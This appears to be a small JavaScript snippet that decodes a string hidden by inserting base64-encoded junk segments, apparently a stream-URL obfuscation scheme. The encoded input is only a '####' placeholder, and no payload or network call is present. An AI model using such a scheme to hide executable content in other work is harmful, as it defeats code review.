function atob(o) {
    if ((o = o.replace(/[ \t\n\f\r]/g, "")).length % 4 == 0 && (o = o.replace(/==?$/, "")), o.length % 4 == 1 || /[^+/0-9A-Za-z]/.test(o)) return null;
    var r = "",
        e = 0,
        n = 0;
    for (var t = 0; t < o.length; t++) e <<= 6, e |= atobLookup(o[t]), n += 6, 24 === n && (r += String.fromCharCode((16711680 & e) >> 16), r += String.fromCharCode((65280 & e) >> 8), r += String.fromCharCode(255 & e), e = n = 0);
    return 12 === n ? (e >>= 4, r += String.fromCharCode(e)) : 18 === n && (e >>= 2, r += String.fromCharCode((65280 & e) >> 8), r += String.fromCharCode(255 & e)), r
}
const keystr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

function atobLookup(t) {
    t = keystr.indexOf(t);
    return t < 0 ? void 0 : t
}

function btoa(t) {
    var r, n, e, a, h, u, c = keystr,
        o = 0,
        i = 0,
        s = "",
        d = [];
    if (!t) return t;
    for (; r = 63 & (h = t.charCodeAt(o++) << 16 | t.charCodeAt(o++) << 8 | t.charCodeAt(o++)) >> 18, n = 63 & h >> 12, e = 63 & h >> 6, a = 63 & h, d[i++] = c.charAt(r) + c.charAt(n) + c.charAt(e) + c.charAt(a), o < t.length;);
    return s = d.join(""), ((u = t.length % 3) ? s.slice(0, u - 3) : s) + "===".slice(u || 3)
}


var v = {
    file3_separator:'//',
	"bk0": "SFL\/dU7B\/Dlx",
    "bk1": "0ca\/BVoI\/NS9",
    "bk2": "box\/2SI\/ZSFc",
    "bk3": "Hbt\/WFjB\/7GW",
    "bk4": "xNv\/T08\/z7F3",
}
function acb() {
 var x = '####'
 a = x.substr(2);
    for (var i = 4; i > -1; i--) {
       // if (exist(v["bk" + i])) 
        {
            if (v["bk" + i] != "") {
                a = a.replace(v.file3_separator + btoa(v["bk" + i]), "");
            }
        }
    }
    // try {
        a = atob(a);
    // } catch (e) {
    //     a = "";
    // }
    return a;
}
acb()
